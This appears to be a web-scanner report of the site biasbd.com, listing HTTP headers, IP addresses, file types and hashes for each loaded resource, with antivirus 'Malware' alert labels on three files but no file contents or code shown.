db298a4dc6d4f14fc38e8479cdfad019d6edd0bee935f748883563cd023dc788
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/industrial/js/owlcarousel/owl.carousel.js?ver=5.2.16 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:57 GMT
content-type: application/x-javascript
last-modified: Mon, 07 Mar 2016 07:01:44 GMT
etag: "1412d-56dd2758-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 17695
date: Tue, 04 Oct 2022 08:23:57 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/plugins/newsletter/subscription/validate.js?ver=6.1.0
111.221.45.32200 OK 373 B URL HTTP/1.1 biasbd.com/wp-content/plugins/newsletter/subscription/validate.js?ver=6.1.0
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
Hash 6c3c2b5c43018392a4c3df17871a5f56
fba911101732bb6df58cdfce5535d60733f159c3
e488e838b05792b01c8a69770395a212314e5ef518fdc97d82d9394e9218b07b
GET /wp-content/plugins/newsletter/subscription/validate.js?ver=6.1.0 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:57 GMT
content-type: application/x-javascript
last-modified: Mon, 01 Jul 2019 18:27:50 GMT
etag: "441-5d1a50a6-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 373
date: Tue, 04 Oct 2022 08:23:57 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-includes/js/wp-embed.min.js?ver=5.2.16
111.221.45.32200 OK 743 B URL HTTP/1.1 biasbd.com/wp-includes/js/wp-embed.min.js?ver=5.2.16
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with very long lines (1391), with no line terminators
Hash b146105040f6faa62806b35ad455d121
14aa49ed4f29b666221a8de3fd17f04455f12b15
05f4d51649be6878352af6843f9a5ffc14bb96ca7a02db21a35a14f6a150b004
GET /wp-includes/js/wp-embed.min.js?ver=5.2.16 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:57 GMT
content-type: application/x-javascript
last-modified: Thu, 15 Apr 2021 13:19:42 GMT
etag: "56f-60783d6e-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 743
date: Tue, 04 Oct 2022 08:23:57 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/uploads/2018/12/BIAS-250x48.png
111.221.45.32200 OK 24 kB URL HTTP/1.1 biasbd.com/wp-content/uploads/2018/12/BIAS-250x48.png
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type PNG image data, 250 x 48, 8-bit/color RGBA, non-interlaced\012- data
Hash 83da6cb7cade509322192bb616f9531e
0ded5573a6adc73c7e023c5450eea60f6c2d4d1d
c4ccfa7e05d3737a7dbd33c906ddac12d76928fe3b9bddb133bca4081905e455
GET /wp-content/uploads/2018/12/BIAS-250x48.png HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:57 GMT
content-type: image/png
last-modified: Tue, 25 Dec 2018 13:25:26 GMT
etag: "5cf6-5c222fc6-0;;;"
accept-ranges: bytes
content-length: 23798
date: Tue, 04 Oct 2022 08:23:57 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/uploads/2018/12/Footer-Logo.png
111.221.45.32200 OK 24 kB URL HTTP/1.1 biasbd.com/wp-content/uploads/2018/12/Footer-Logo.png
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type PNG image data, 250 x 48, 8-bit/color RGBA, non-interlaced\012- data
Hash 416feb62cde2930c989636a326a7103f
8aaa81a4ce1998074ed1d17c10df350306952c5b
562715b9bbb4b2632f475d44a3132c29af1c1b5f9da1f85067cba728df7b5daf
GET /wp-content/uploads/2018/12/Footer-Logo.png HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:58 GMT
content-type: image/png
last-modified: Tue, 25 Dec 2018 16:43:48 GMT
etag: "5cdb-5c225e44-0;;;"
accept-ranges: bytes
content-length: 23771
date: Tue, 04 Oct 2022 08:23:58 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/uploads/2018/12/BIAS-Logo-Mobile.png
111.221.45.32200 OK 17 kB URL HTTP/1.1 biasbd.com/wp-content/uploads/2018/12/BIAS-Logo-Mobile.png
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type PNG image data, 250 x 48, 8-bit colormap, non-interlaced\012- data
Hash ad04d43a7265b80f4f034f7589e21a42
7fd6f9f3dc7c283d18f3cf83211f71f506ec78a9
0eefe54009aa11413adbc18b91f5397d7ce428b2f6cd6c9df15c209a6e018a7e
GET /wp-content/uploads/2018/12/BIAS-Logo-Mobile.png HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:58 GMT
content-type: image/png
last-modified: Tue, 25 Dec 2018 13:41:14 GMT
etag: "4422-5c22337a-0;;;"
accept-ranges: bytes
content-length: 17442
date: Tue, 04 Oct 2022 08:23:58 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/plugins/js_composer/assets/lib/bower/font-awesome/fonts/fontawesome-webfont.woff2?v=4.7.0
111.221.45.32200 OK 77 kB URL HTTP/1.1 biasbd.com/wp-content/plugins/js_composer/assets/lib/bower/font-awesome/fonts/fontawesome-webfont.woff2?v=4.7.0
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type Web Open Font Format (Version 2), TrueType, length 77160, version 4.459\012- data
Hash af7ae505a9eed503f8b8e6982036873e
d6f48cba7d076fb6f2fd6ba993a75b9dc1ecbf0c
2adefcbc041e7d18fcf2d417879dc5a09997aa64d675b7a3c4b6ce33da13f3fe
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/js_composer/assets/lib/bower/font-awesome/fonts/fontawesome-webfont.woff2?v=4.7.0 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Referer: http://biasbd.com/wp-content/plugins/js_composer/assets/lib/bower/font-awesome/css/font-awesome.min.css?ver=5.5
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:57 GMT
content-type: application/font-woff2
etag: "12d68-5c21c312-0;;;"
accept-ranges: bytes
content-length: 77160
date: Tue, 04 Oct 2022 08:23:57 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 471 B IP 142.250.74.3:0
Hash 129fe858bf2aa7291fd2c6dd4cf9d226
e3e048b964b851ebbdcfb5bd80ebdbad13720cf6
addc7e4ddab73c8c7ee50f6d33fc1e4ff73b71cc014e481049a393c3b87b0924
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Tue, 04 Oct 2022 08:23:58 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
www.youtube.com/player_api
172.217.21.174200 OK 959 B URL HTTP/2 www.youtube.com/player_api
IP 172.217.21.174:0
File type ASCII text, with very long lines (509)
Hash dd6f897e5ce3b7cd82b0299f6bd7f8e4
5d87a5936c04d6cc72b86aade51445acc4bc728e
5a3f2085a56c0351b2f5299702f797cd9117d8ae460684f73ca0b1e125e2e2d3
GET /player_api HTTP/1.1
Host: www.youtube.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://biasbd.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-type: text/javascript; charset=utf-8
x-content-type-options: nosniff
expires: Tue, 04 Oct 2022 08:23:58 GMT
date: Tue, 04 Oct 2022 08:23:58 GMT
cache-control: private, max-age=0
strict-transport-security: max-age=31536000
x-frame-options: SAMEORIGIN
cross-origin-opener-policy-report-only: same-origin; report-to="youtube_main"
report-to: {"group":"youtube_main","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube_main"}]}
permissions-policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-platform=*, ch-ua-platform-version=*
cross-origin-resource-policy: cross-origin
p3p: CP="This is not a P3P policy! See http://support.google.com/accounts/answer/151657?hl=en for more info."
content-encoding: br
server: ESF
x-xss-protection: 0
set-cookie: YSC=Kt3We10JEg0; Domain=.youtube.com; Path=/; Secure; HttpOnly; SameSite=none
VISITOR_INFO1_LIVE=za7kdciXzbY; Domain=.youtube.com; Expires=Sun, 02-Apr-2023 08:23:58 GMT; Path=/; Secure; HttpOnly; SameSite=none
CONSENT=PENDING+083; expires=Thu, 03-Oct-2024 08:23:58 GMT; path=/; domain=.youtube.com; Secure
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
biasbd.com/?wc-ajax=get_refreshed_fragments
111.221.45.32200 OK 273 B URL HTTP/1.1 biasbd.com/?wc-ajax=get_refreshed_fragments
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type JSON data\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (651), with no line terminators
Hash cf1426d78e2f56e4ccc3efa80dff7041
dc32c36de124a6bd7b2b41c848323048106d937a
6be520b9293a64ebea7f2973933b1420e73f489eab9f57d59c7a1443174ded4f
POST /?wc-ajax=get_refreshed_fragments HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 18
Origin: http://biasbd.com
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
access-control-allow-origin: *
access-control-allow-credentials: true
x-content-type-options: nosniff
x-robots-tag: noindex
content-type: application/json; charset=UTF-8
expires: Wed, 11 Jan 1984 05:00:00 GMT
cache-control: no-transform, no-cache, must-revalidate, max-age=0
content-length: 273
content-encoding: gzip
vary: Accept-Encoding
date: Tue, 04 Oct 2022 08:23:58 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
biasbd.com/wp-content/uploads/2018/12/icon_7Lz_icon.ico
111.221.45.32200 OK 50 kB URL HTTP/1.1 biasbd.com/wp-content/uploads/2018/12/icon_7Lz_icon.ico
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type MS Windows icon resource - 1 icon, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel\012- data
Hash 716b7a5fa64090c844c34233b52e9dce
5fd691493d90f48a68d7796f036d00de66b8e4e1
5948d456a850b34097aebca14298086e473a6a91a243c562777799a24609fdc1
Analyzer Verdict Alert fortinet Malware
GET /wp-content/uploads/2018/12/icon_7Lz_icon.ico HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:58 GMT
content-type: image/x-icon
etag: "c2dd-5c2233da-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 49923
date: Tue, 04 Oct 2022 08:23:58 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
cdn.jsdelivr.net/emojione/2.2.7/lib/js/emojione.min.js
151.101.85.229200 OK 66 kB URL HTTP/2 cdn.jsdelivr.net/emojione/2.2.7/lib/js/emojione.min.js
IP 151.101.85.229:0
Hash f851d55788bfd9cf47165f52fe8b77e2
71affb2da4e3648bd6016c692173772cfef2b1b3
40e26abae9efcbb07e7dd072b3c03b29b8995ba01303fd9704404bbc22d00374
GET /emojione/2.2.7/lib/js/emojione.min.js HTTP/1.1
Host: cdn.jsdelivr.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://biasbd.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
access-control-allow-origin: *
access-control-expose-headers: *
timing-allow-origin: *
cache-control: public, max-age=31536000, s-maxage=31536000, immutable
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
strict-transport-security: max-age=31536000; includeSubDomains; preload
content-type: application/javascript; charset=utf-8
etag: W/"49dda-cp9vjKV4fYl0Ow7X6yf9dkBr+YU"
content-encoding: gzip
accept-ranges: bytes
date: Tue, 04 Oct 2022 08:24:00 GMT
age: 17018196
x-served-by: cache-fra19156-FRA, cache-bma1636-BMA
x-cache: HIT, HIT
vary: Accept-Encoding
alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
content-length: 53889
X-Firefox-Spdy: h2
ocsp.globalsign.com/ca/gsatlasr3dvtlsca2022q1
104.18.21.226200 OK 13 kB URL HTTP/1.1 ocsp.globalsign.com/ca/gsatlasr3dvtlsca2022q1
IP 104.18.21.226:0
Hash d048e4bfe3fe97f4dca6c17b05668054
467a9bdf5d2c592a82d6ed74cf8efe6c21a36d5c
bff21e7e740925707cd8e2f282876c331a7f8bc65d2ce9fef9fdf6d7d146b7fa
POST /ca/gsatlasr3dvtlsca2022q1 HTTP/1.1
Host: ocsp.globalsign.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 04 Oct 2022 08:24:00 GMT
Content-Type: application/ocsp-response
Transfer-Encoding: chunked
Connection: keep-alive
Etag: "175C52EDC858ADE458D1438BC62851F03D381ECD"
Expires: Tue, 04 Oct 2022 19:00:00 GMT
Last-Modified: Tue, 04 Oct 2022 07:00:00 UTC
Cache-Control: s-maxage=3600, public, no-transform, must-revalidate
CF-Cache-Status: HIT
Age: 1683
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 754c84c8789b0b49-OSL
vsa105.tawk.to/s/?k=633bed9f2197f171f6595b2d&cver=0&pop=false&asver=9&tkn=eyJhbGciOiJFUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6InZpc2l0b3ItYXBwbGljYXRpb24tc2VydmVyLTIwMjEwMjIifQ.eyJwaWQiOiI1YzdhYzhhZmE3MjZmZjJlZWE1YTQ3Y2IiLCJ2aWQiOiI0ZTM1YjI0ZjUwZGI4NzliZjMzYjUzOGY5N2ZiNWU1Y2RhM2E4MTI0NWNhM2JlMDRmNzg3MTU0NDA1Y2U4YTFkIiwic2lkIjoiNjMzYmVkOWYyMTk3ZjE3MWY2NTk1YjJkIiwiaWF0IjoxNjY0ODcxODM5LCJleHAiOjE2NjQ4NzM2MzksImp0aSI6IkR4d0hlOWxPNDZ5WUNUanphNkpHWCJ9.PxR4EK5YG_NhgOeQZb_CXsYWy-jAokM3IhKBfIgwLPdMnVXCNs3CGK5-FMy4VGtHGnClEMzyQ6zUffUBdXLefQ&EIO=3&transport=websocket&__t=OEY63Q6
172.67.38.66101 Switching Protocols 814 B URL HTTP/1.1 vsa105.tawk.to/s/?k=633bed9f2197f171f6595b2d&cver=0&pop=false&asver=9&tkn=eyJhbGciOiJFUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6InZpc2l0b3ItYXBwbGljYXRpb24tc2VydmVyLTIwMjEwMjIifQ.eyJwaWQiOiI1YzdhYzhhZmE3MjZmZjJlZWE1YTQ3Y2IiLCJ2aWQiOiI0ZTM1YjI0ZjUwZGI4NzliZjMzYjUzOGY5N2ZiNWU1Y2RhM2E4MTI0NWNhM2JlMDRmNzg3MTU0NDA1Y2U4YTFkIiwic2lkIjoiNjMzYmVkOWYyMTk3ZjE3MWY2NTk1YjJkIiwiaWF0IjoxNjY0ODcxODM5LCJleHAiOjE2NjQ4NzM2MzksImp0aSI6IkR4d0hlOWxPNDZ5WUNUanphNkpHWCJ9.PxR4EK5YG_NhgOeQZb_CXsYWy-jAokM3IhKBfIgwLPdMnVXCNs3CGK5-FMy4VGtHGnClEMzyQ6zUffUBdXLefQ&EIO=3&transport=websocket&__t=OEY63Q6
IP 172.67.38.66:0
Hash be6d6190b2cb8744ffc34bfd28f25b48
d6747ac18fc4fd8351c92e2d9d5eadde16ba9ccc
c52f1813f57ba795ea12b83602e6e7b2f8abc7c94754e495c757470b4c4ae28c
GET /s/?k=633bed9f2197f171f6595b2d&cver=0&pop=false&asver=9&tkn=eyJhbGciOiJFUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6InZpc2l0b3ItYXBwbGljYXRpb24tc2VydmVyLTIwMjEwMjIifQ.eyJwaWQiOiI1YzdhYzhhZmE3MjZmZjJlZWE1YTQ3Y2IiLCJ2aWQiOiI0ZTM1YjI0ZjUwZGI4NzliZjMzYjUzOGY5N2ZiNWU1Y2RhM2E4MTI0NWNhM2JlMDRmNzg3MTU0NDA1Y2U4YTFkIiwic2lkIjoiNjMzYmVkOWYyMTk3ZjE3MWY2NTk1YjJkIiwiaWF0IjoxNjY0ODcxODM5LCJleHAiOjE2NjQ4NzM2MzksImp0aSI6IkR4d0hlOWxPNDZ5WUNUanphNkpHWCJ9.PxR4EK5YG_NhgOeQZb_CXsYWy-jAokM3IhKBfIgwLPdMnVXCNs3CGK5-FMy4VGtHGnClEMzyQ6zUffUBdXLefQ&EIO=3&transport=websocket&__t=OEY63Q6 HTTP/1.1
Host: vsa105.tawk.to
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: http://biasbd.com
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: 6eDjkKWj63fLTkaf6L1UgA==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket
HTTP/1.1 101 Switching Protocols
Date: Tue, 04 Oct 2022 08:24:00 GMT
Connection: upgrade
upgrade: websocket
sec-websocket-accept: aMdUUY+DSeYnsHFR92BIAmjZMf0=
sec-websocket-extensions: permessage-deflate
strict-transport-security: max-age=0; includeSubDomains; preload
CF-Cache-Status: DYNAMIC
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 754c84c71c77b50b-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
embed.tawk.to/_s/v4/app/63258f417d7/js/twk-main.js
104.22.24.131200 OK 0 B URL HTTP/2 embed.tawk.to/_s/v4/app/63258f417d7/js/twk-main.js
IP 104.22.24.131:0
GET /_s/v4/app/63258f417d7/js/twk-main.js HTTP/1.1
Host: embed.tawk.to
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://biasbd.com
Connection: keep-alive
Referer: http://biasbd.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
date: Tue, 04 Oct 2022 08:23:58 GMT
content-type: application/javascript
last-modified: Sat, 17 Sep 2022 09:12:03 GMT
etag: W/"da5bb1dc647470204df0e49f5afac2de"
access-control-allow-origin: *
cache-control: public, max-age=2592000, immutable
x-cache-status: HIT
strict-transport-security: max-age=0; includeSubDomains; preload
cf-cache-status: MISS
vary: Accept-Encoding
x-content-type-options: nosniff
server: cloudflare
cf-ray: 754c84c088e9b4ed-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2
embed.tawk.to/_s/v4/app/63258f417d7/js/twk-runtime.js
104.22.24.131200 OK 0 B URL HTTP/2 embed.tawk.to/_s/v4/app/63258f417d7/js/twk-runtime.js
IP 104.22.24.131:0
GET /_s/v4/app/63258f417d7/js/twk-runtime.js HTTP/1.1
Host: embed.tawk.to
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://biasbd.com
Connection: keep-alive
Referer: http://biasbd.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
date: Tue, 04 Oct 2022 08:23:58 GMT
content-type: application/javascript
last-modified: Sat, 17 Sep 2022 09:12:03 GMT
etag: W/"31ca85b2b61bb42db4e40c2e9429f7dc"
access-control-allow-origin: *
cache-control: public, max-age=2592000, immutable
x-cache-status: HIT
strict-transport-security: max-age=0; includeSubDomains; preload
cf-cache-status: MISS
vary: Accept-Encoding
x-content-type-options: nosniff
server: cloudflare
cf-ray: 754c84c0991ab4ed-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2
embed.tawk.to/_s/v4/app/63258f417d7/js/twk-app.js
104.22.24.131200 OK 0 B URL HTTP/2 embed.tawk.to/_s/v4/app/63258f417d7/js/twk-app.js
IP 104.22.24.131:0
GET /_s/v4/app/63258f417d7/js/twk-app.js HTTP/1.1
Host: embed.tawk.to
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://biasbd.com
Connection: keep-alive
Referer: http://biasbd.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
date: Tue, 04 Oct 2022 08:23:58 GMT
content-type: application/javascript
last-modified: Sat, 17 Sep 2022 09:12:03 GMT
etag: W/"e736e189edb5d0d9d5b8e7f23dd9114a"
access-control-allow-origin: *
cache-control: public, max-age=2592000, immutable
x-cache-status: HIT
strict-transport-security: max-age=0; includeSubDomains; preload
cf-cache-status: MISS
vary: Accept-Encoding
x-content-type-options: nosniff
server: cloudflare
cf-ray: 754c84c0a91cb4ed-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2
embed.tawk.to/_s/v4/app/63258f417d7/js/twk-vendor.js
104.22.24.131200 OK 0 B URL HTTP/2 embed.tawk.to/_s/v4/app/63258f417d7/js/twk-vendor.js
IP 104.22.24.131:0
GET /_s/v4/app/63258f417d7/js/twk-vendor.js HTTP/1.1
Host: embed.tawk.to
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://biasbd.com
Connection: keep-alive
Referer: http://biasbd.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
date: Tue, 04 Oct 2022 08:23:59 GMT
content-type: application/javascript
last-modified: Sat, 17 Sep 2022 09:12:03 GMT
etag: W/"7dcb496e4882926f93f2e73fa87062c0"
access-control-allow-origin: *
cache-control: public, max-age=2592000, immutable
x-cache-status: HIT
strict-transport-security: max-age=0; includeSubDomains; preload
cf-cache-status: MISS
vary: Accept-Encoding
x-content-type-options: nosniff
server: cloudflare
cf-ray: 754c84c098f0b4ed-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2
embed.tawk.to/_s/v4/app/63258f417d7/js/twk-chunk-common.js
104.22.24.131200 OK 0 B URL HTTP/2 embed.tawk.to/_s/v4/app/63258f417d7/js/twk-chunk-common.js
IP 104.22.24.131:0
GET /_s/v4/app/63258f417d7/js/twk-chunk-common.js HTTP/1.1
Host: embed.tawk.to
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://biasbd.com
Connection: keep-alive
Referer: http://biasbd.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
date: Tue, 04 Oct 2022 08:23:59 GMT
content-type: application/javascript
last-modified: Sat, 17 Sep 2022 09:12:03 GMT
etag: W/"c262969ff89da8a8b3994883a0f57085"
access-control-allow-origin: *
cache-control: public, max-age=2592000, immutable
x-cache-status: HIT
strict-transport-security: max-age=0; includeSubDomains; preload
cf-cache-status: MISS
vary: Accept-Encoding
x-content-type-options: nosniff
server: cloudflare
cf-ray: 754c84c09917b4ed-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2
fonts.googleapis.com/css?family=Montserrat%3A400italic%2C400%2C600%2C700%2C300&subset=latin%2Clatin-ext&ver=5.2.16
142.250.74.10200 OK 0 B URL HTTP/2 fonts.googleapis.com/css?family=Montserrat%3A400italic%2C400%2C600%2C700%2C300&subset=latin%2Clatin-ext&ver=5.2.16
IP 142.250.74.10:0
GET /css?family=Montserrat%3A400italic%2C400%2C600%2C700%2C300&subset=latin%2Clatin-ext&ver=5.2.16 HTTP/1.1
Host: fonts.googleapis.com
